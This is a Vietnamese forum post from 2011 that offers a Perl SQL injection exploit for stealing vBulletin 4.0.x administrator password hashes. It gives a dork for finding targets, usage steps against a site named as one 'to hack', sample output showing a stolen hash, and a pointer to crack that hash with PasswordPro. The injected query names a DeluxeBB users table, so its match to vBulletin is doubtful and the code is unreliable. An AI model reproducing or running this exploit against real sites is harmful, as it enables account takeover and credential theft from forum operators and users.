BLOG OF H7T_2002

Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.
BLOG OF H7T_2002

Trang cá nhân của H7T_2002++


    Tham khảo hack pass Admin vbb 4.0.x

    h7t_2002
    avatar
    h7t_2002
    --[DEVELOPER]--
    --[DEVELOPER]--


    Tổng số bài gửi : 67
    Join date : 01/06/2009
    Age : 33
    Đến từ : /dev/null
    • Post n°1

    Tham khảo hack pass Admin vbb 4.0.x Empty Tham khảo hack pass Admin vbb 4.0.x

    Bài gửi by h7t_2002 Thu Jun 09, 2011 2:08 pm

    * Code Perl:

    Code:
    #!/usr/bin/perl

    use IO::Socket;


    print q{
    #######################################################################
    #vBulletin? Version 4.0.1 Remote SQL Injection Exploit
    #By JAR
    # our Site www.hackerzjar.com
    # Dork: Powered by vBulletin? Version 4.0.1
    #######################################################################
    };

    if (!$ARGV[2]) {

    print q{
    Usage: perl VB4.0.1.pl host /directory/ victim_userid

    perl VB4.0.1.pl www.vb.com /forum/ 1


    };

    }


    $server = $ARGV[0];
    $dir = $ARGV[1];
    $user = $ARGV[2];
    $myuser = $ARGV[3];
    $mypass = $ARGV[4];
    $myid = $ARGV[5];

    print "------------------------------------------------------------------------------------------------\r\n";
    print "[>] SERVER: $server\r\n";
    print "[>] DIR: $dir\r\n";
    print "[>] USERID: $user\r\n";
    print "------------------------------------------------------------------------------------------------\r\n\r\n";

    $server =~ s/(http:\/\/)//eg;

    $path = $dir;
    $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ​ ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


    print "[~] PREPARE TO CONNECT...\r\n";

    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

    print "[+] CONNECTED\r\n";
    print "[~] SENDING QUERY...\r\n";
    print $socket "GET $path HTTP/1.1\r\n";
    print $socket "Host: $server\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\r\n";
    print "[+] DONE!\r\n\r\n";



    print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
    while ($answer = <$socket>)
    {

    if ($answer =~/(\w{32})/)
    {

    if ($1 ne 0) {
    print "Password is: ".$1."\r\n";
    print "--------------------------------------------------------------------------------------\r\n";

    }
    exit();
    }

    }
    print "------------------------------------------------------------------------------------------------\r\n";

    * Save nó lại thành file (*.pl, Ex: XVN.pl).
    * Khai thác:
    Vào CMD và gõ:

    C:\>XVN.pl
    C:\>XVN.pl www.webmuonhack.vn /forum/ 1

    * Kết quả:
    ---------------------------------------------------
    [>] SERVER: ........................
    [>] DIR: /forum/
    [>] USERID: 1
    --------------------------------------------------
    [~] PREPARE TO CONNECT...
    [+] CONNECTED
    [~] SENDING QUERY...
    [+] DONE!
    --[ REPORT ]------------------------------------
    Password is: 3f5fc6d550ddda10ef207d1ecb3b79aa
    ---------------------------------------------------

    * Có đc pass òy đó. Tiếp theo chắc bạn đã biết phải làm gì (sử dụng PasswordPro chẳng hạn, ...
    • Về Đầu Trang
      Hôm nay: Mon May 20, 2024 8:14 am